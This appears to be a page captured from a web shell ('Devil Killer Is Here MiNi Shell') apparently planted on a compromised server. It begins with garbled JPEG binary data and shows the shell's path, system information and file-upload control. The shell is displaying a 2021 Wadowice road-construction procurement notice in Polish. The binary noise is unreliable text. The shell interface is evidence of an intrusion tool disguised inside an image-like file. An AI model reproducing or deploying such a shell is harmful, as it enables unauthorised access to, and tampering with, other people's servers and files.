JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210819/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210819/0015478403-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbud.drogi gm.nr470561K (..)przebud.skrzyż. ul.Fatimskiej,Poprzecznej,Spółdzielców,Wolności(wkm od0(…)do km0+043,64,w kmod0+390,09do km0+417,wkm od 0(…)do km0+008,34)w m.Wadowice. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wadowice - Urząd Miejski w Wadowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000526423</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Jana Pawła II 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wadowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 33 873 18 11</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 33 873 18 15</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umwadowice@wadowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wadowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbud.drogi gm.nr470561K (..)przebud.skrzyż. ul.Fatimskiej,Poprzecznej,Spółdzielców,Wolności(wkm od0(…)do km0+043,64,w kmod0+390,09do km0+417,wkm od 0(…)do km0+008,34)w m.Wadowice. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9c909150-00ea-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00154784</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001773/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Rozbud.drogi gm.nr470561K (..)przebud.skrzyż. ul.Fatimskiej,Poprzecznej,Spółdzielców,Wolności(wkm od0(…)do km0+043,64,w kmod0+390,09do km0+417,wkm od 0(…)do km0+008,34)w m.Wado.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ oraz https://bip.malopolska.pl/umwadowice,m,341942,2021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,.doc, .docx, .odt.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>Zamawiający przekazuje ID postępowania z miniPortalu jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert i wniosków)<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż oferty), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email zamowienia@wadowice.pl<br/>Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 9.9.2 adres email. Sposób sporządzenia dokumentów elektronicznych musi być zgodny<br/>z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/><br/> administratorem danych zbieranych i przetwarzanych w celu prowadzenia postępowania, zawarcia umowy oraz realizacji umowy jest Burmistrz Wadowic, Urząd Miejski w Wadowicach, Plac Jana Pawła II 23, 34-100 Wadowice, tel. 33 873 18 11, e-mail: um@wadowice.pl<br/> dane kontaktowe do Inspektora Ochrony Danych: Urząd Miejski w Wadowicach, Pl. Jana Pawła II 23, 34-100 Wadowice, tel. 33 873 18 11, e-mail: iod@wadowice.pl<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit.c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego;<br/> odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art.74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. z 2021 r. poz.1129 z późn.zm.), dalej „ustawa Pzp”;<br/> dane osobowe będą przechowywane, zgodnie z art.78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> obowiązek podania danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; ewentualne konsekwencje niepodania określonych danych osobowych wynikają z ustawy Pzp;<br/> w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, w tym nie będą profilowane, stosowanie do art.22 RODO;<br/> w związku z przetwarzaniem danych osobowych przysługują następujące prawa:<br/>− prawo dostępu do treści swoich danych (art.15 RODO);<br/>− prawo do sprostowania swoich danych osobowych (art.16 RODO); jednocześnie skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>− prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust.2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO (art.77 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.58.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Zakres robót budowlanych w liniach rozgraniczających teren inwestycji<br/>4.1.1	Rozbudowa ulicy Spółdzielców w Wadowicach: <br/>1)	Budowa nowego odcinka drogi dojazdowej publicznej klasy D w km 0+126,08 do 0+390,09 o długości ok. 264,01 m i szer. 5,00 pomiędzy ul. Spółdzielców, a Al. M. B. Fatimskiej wraz z przebudową drogi dojazdowej publicznej klasy D – ul. Spółdzielców w km 0+008,34 do 0+126,08.<br/>2)	Budowa sieci kanalizacji deszczowej. <br/>3)	Budowa instalacji oświetlenia ulicznego (należy zastosować źródło światła LED o mocy wynikającej z obliczeń, oprawy nie generujące mocy biernej, oprawy przystosowane do obniżenia natężenia oświetlenia do 70% w godzina nocnych).<br/>4)	Budowa kanału technologicznego.<br/>5)	Budowa ronda na skrzyżowaniu Al. M. B. Fatimskiej, ul. Spółdzielców i ul. Poprzecznej. <br/>6)	Budowa ciągu pieszo – rowerowego (strona lewa) o szerokości 2,50 m w km 0+016,15 do 0+124,40.<br/>7)	Budowa jednokierunkowej ścieżki rowerowej szer. 1,50 m oraz schodów terenowych szer. 1,50 m (strona lewa) w km 0+124,40 do 0+337,50 m.<br/>8)	Budowa ciągu pieszo – rowerowego (strona lewa) o szerokości 3,0 m w km 0+337,50 m do 0+380,39.<br/>9)	Budowa ciągu pieszego o szer. 3,00 m w km 0+011,10 do 0+124,40 (strona prawa) oraz w km 0+380,39 do 0+390,09 (strona lewa). <br/>10)	Budowa ciągu pieszego o szer. 2,00 (strona prawa) w km 0+369,98 do 0+390,09.<br/>11)	Budowa pobocza gruntowego o szer. 0,75 m (strona prawa) w km 0+369,98 do 0+369,98.<br/>4.1.2	Budowa nowych zjazdów indywidualnych:<br/>1)	w km 0+307,08 na działkę 1018/7 (1018/2) obr. nr 0001 Wadowice jedn. ewid. 121809 4 Wadowice-Miasto w miejscowości Wadowice<br/>2)	w km 0+352,54 na działkę 1001/3 (1001/2) obr. nr 0001 Wadowice jedn. ewid. 121809 4 Wadowice-Miasto w miejscowości Wadowice<br/>3)	w km 0+364,79 na działkę 1003/3 (1003) obr. nr 0001 Wadowice jedn. ewid. 121809 4 Wadowice-Miasto w miejscowości Wadowice<br/>4)	w km 0+124,40 na działkę na działkę 1024/23 (1024/19) obr. nr 0001 Wadowice jedn. ewid. 121809 4 Wadowice-Miasto w miejscowości Wadowice<br/>4.1.3	Przebudowa zjazdów indywidualnych w ciągu przebudowywanej ul. Spółdzielców w Wadowicach:<br/>1)	w km 0+012,40 zjazd na działkę 1022/7 m. Wadowice, <br/>2)	w km 0+033,60 zjazd na działkę 1022/8 m. Wadowice<br/>3)	w km 0+039,60 zjazd na działkę 1022/9 m. Wadowice <br/>4)	w km 0+064,10 zjazd na działkę 1022/10 m. Wadowice,<br/>5)	w km 0+075,90 zjazd na działkę 1022/11 m. Wadowice,<br/>6)	w km 0+101,20 zjazd na działkę 1022/12 m. Wadowice,<br/>7)	w km 0+119,40 zjazd na działkę 1022/13 m. Wadowice,<br/>8)	w km 0+033,70 zjazd na działkę 1027/7 m. Wadowice,<br/>9)	w km 0+052,10 zjazd na działkę 1027/8 m. Wadowice,<br/>10)	w km 0+061,60 zjazd na działkę 1027/9 m. Wadowice,<br/>11)	w km 0+076,30 zjazd na działkę 1027/10 m. Wadowice,<br/>12)	w km 0+102,60 zjazd na działkę 1027/11 m. Wadowice,<br/>13)	w km 0+120,80 zjazd na działkę 1027/12 m. Wadowice.<br/>4.1.4	Wyburzenie obiektów kubaturowych1:<br/>1)	Budynek mieszkalny (pustostan) zlokalizowany na działce 3411/3 (3411) w miejscowości Wadowice.<br/>2)	Budynek handlowo-usługowy zlokalizowany na działce 1003/4 (1003) w miejscowości Wadowice.<br/>3)	Garaż zlokalizowany na działce 1003/4 (1003) w miejscowości Wadowice.<br/>4)	Garaż zlokalizowany na działce 3881 w miejscowości Wadowice.<br/>5)	Rozbiórka istniejących ogrodzeń o długości ok. 65,8 m. <br/>4.1.5	Rozbiórka sieci i przyłączy:<br/>1)	Sieć eN dł. 6,5m na działce nr 3408/2 (3408) w miejscowości Wadowice.<br/>2)	Przyłącz wody dł. 13,8m na działce nr 1003/4 (1003), 2868/4 (2868) i dł. 8,50m na działce 2868/4 (2868) w miejscowości Wadowice.<br/>3)	Przyłącz NN dł. 16,Om na działce 1003/4 (1003) oraz dł. 6,00m na działce 1003/4 (1003), 2868/4 (2868) w miejscowości Wadowice.<br/>4)	Przyłącz tt dł. l,7m na działce 1003/4 (1003) w miejscowości Wadowice.<br/>5)	Przyłącz kanalizacji sanitarnej dł. l,8 m na działce 1003/4 (1003) w miejscowości Wadowice.<br/><br/>4.1.6	Budowa infrastruktury technicznej:<br/>1)	Przyłącz wody dł. 7,0 m na działce nr 3408/2 (3408) w miejscowości Wadowice.<br/>2)	Budowa sieci eN dł. 5,2 mb na działce nr 3408/2 (3408) w miejscowości Wadowice.<br/>4.1.7	Rozbudowa ulicy Poprzecznej w Wadowicach – drogi gminnej publicznej klasy L na odcinku 0+0,000 – 0+017,50 m. <br/>1)	Przebudowa geometrii wlotu ulicy Poprzecznej na włączeniu do Al. M.B. Fatimskiej. Szerokość jezdni 5,50 m z obustronnymi chodnikami szer. 1,7 m do 4,00 m (zapewniona ciągłość z istniejącym ciągiem pieszym). Przebieg krawędzi jezdni dostosowano do geometrii układu ulicy na dalszym jej przebiegu. Pas drogowy rozbudowany zostanie o działkę nr 68/14 (68/3) w miejscowości Wadowice. Krawędź jezdni wlotu/wylotu wyokrąglona łukami o promieniu 6,00 oraz 8,00 m.<br/>2)	Rozbiórka sieci wodociągowej o dł. 13,6 m i budowa sieci wodociągowej dł. 13,3 m na działce 68/13 oraz 3880 w miejscowości Wadowice, z uwagi na zmianę przebiegu wodociągu w Al. M. B. Fatimskiej.<br/>3)	Rozebrany fragmentu sieci eN długości l,6m na działce nr 68/14 (68/3) w miejscowości Wadowice oraz wybudowanie nowego odcinka sieci w nowej lokalizacji dł. 2,6 m, w celu usunięcia kolizji z istniejąca siecią ciepłowniczą (na warunkach wydanych przez właścicieli poszczególnych sieci).<br/>4.2. Zakres robót budowlanych poza liniami rozgraniczającymi teren inwestycji<br/>4.2.1	Przebudowa skrzyżowania Al. M. B. Fatimskiej i ul. Poprzecznej na skrzyżowanie typu rondo. Średnica zewnętrzna ronda 22 m, średnica wyspy środkowej 8 m. Jezdnia wokół ronda szerokości 7 m, ciągi piesze szerokości 2,00 - 3,00 m. Promienie wyokrąglające wlot/wylot odpowiednio 6,00 oraz 8,00 m.<br/>4.2.2	Przebudowa Al. Wolności w zakresie wlotu ul. Spółdzielców poprzez budowę skrzyżowania zwykłego nieskanalizowanego. Promienie wyokrąglające jezdnię wynoszą 6,00 m oraz 9,00 m. Przebudowa ciągów pieszych zlokalizowanych bezpośrednio przy jezdni szerokość 3,00 -3,30 m w nawiązaniu do stanu istniejącego.<br/>4.2.3	Rozbiórka, przebudowa i budowa podziemnej infrastruktury na warunkach pozyskanych od właścicieli sieci:<br/>1)	Rozbiórka sieci wodociągowej długości 43,3 m i 3,50 m oraz przyłącza wodociągowego łącznej dł. 20 m, budowa sieci wodociągowej < D200 - L = 45,9 m i ø 110 - L = 2,5 m oraz budowa przyłącza wodociągowego na działce 2837/2 w miejscowości Wadowice - Al. M. B. Fatimskiej (z obowiązku nr 7).<br/>2)	Rozbiórka sieci NN długości 12,4 m; budowa sieci NN długości 13,2 m na działce 2837/2 w miejscowości Wadowice - Al. M. B. Fatimskiej (z obowiązku nr 15).<br/>3)	Rozbiórka sieci wodociągowej długości 25,5 m i sieci wodociągowej dł. 2,1 m, budowa sieci wodociągowej ø 200 – L = 27,2 m na działce 2865/6 w miejscowości Wadowice - Al. Wolności (z obowiązku nr 8).<br/>4)	Rozbiórka przyłącza wodociągowego łącznej długości 6,6 m, rozbiórka przyłącza eN dł. 4,0 m; budowa przyłącza wodociągowego na działce 2868/3 (2868), 3408/1 (3408), 1003/3 (1003) w miejscowości Wadowice (z obowiązku nr 9).<br/>5)	Rozbiórka przyłącza eN dł. 12,7 m na działce 1003/3 (1003), 2868/3 (2868); przebudowa przyłącza NN do budynku zlokalizowanego na działce 3407 na działce 2868/3 (2868) w miejscowości Wadowice (z obowiązku nr 10).<br/>6)	Rozbiórka sieci eN dł. 1,7 m; budowa sieci NN dł. 0,9 m na działce 68/15 w miejscowości Wadowice (z obowiązku nr 11).<br/>7)	Rozbiórka sieci tt dł. 22,9 m; budowa sieci teletechnicznej dł. 30,0 m i deszczowej na działce 2837/2 w miejscowości Wadowice (z obowiązku nr 16).<br/>8)	Rozbiórka przyłącza kanalizacji sanitarnej dł. 8,2 m i budowa sieci kanalizacji deszczowej na działce 2837/2 w miejscowości Wadowice (z obowiązku nr 17).<br/><br/>4.2.4	Budowa zjazdów w nawiązaniu do istniejącego terenu:<br/>1)	Zjazd z obowiązku nr 12 zlokalizowany na działce 1003/3 (1003) w miejscowości Wadowice.<br/>2)	Zjazd z obowiązku nr 13 zlokalizowany na działce 1001/3 (1001/2) w miejscowości Wadowice.<br/>3)	Zjazd z obowiązku nr 14 zlokalizowany na działce 1018/7 (1018/2) w miejscowości Wadowice.<br/><br/>4.2.5 Ułożenie korytek ściekowych z odprowadzeniem wód do projektowanej kanalizacji deszczowej.<br/>4.2.6	Budowa umocnienia skarp w systemie „gabion” oraz geosyntetykiem.<br/>4.2.7	Wycinka drzew zlokalizowanych w liniach rozgraniczających teren inwestycji.<br/>4.2.8	Rozbiórka ogrodzeń z siatki oraz ogrodzenia drewnianego. W projekcie anulowano wybudowanie nowych ogrodzeń (projekt budowlany: strona nr 7 wers 40-45 – wykreślono, strona nr 55 wykreślono).<br/>4.2.9	Wykonanie oraz zatwierdzenie w Starostwie Powiatowym w Wadowicach projektu tymczasowej organizacji ruchu tj. na czas trwania inwestycji.<br/>4.3	Wykonawca zapewni nadzór archeologiczny podczas prowadzenia wszystkich prac ziemnych zgodnie z pismem Małopolskiego Wojewódzkiego Konserwatora Zabytków w Krakowie z dnia 9.03.2017 roku, znak OZKr.5183.430.2016.ED.2. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 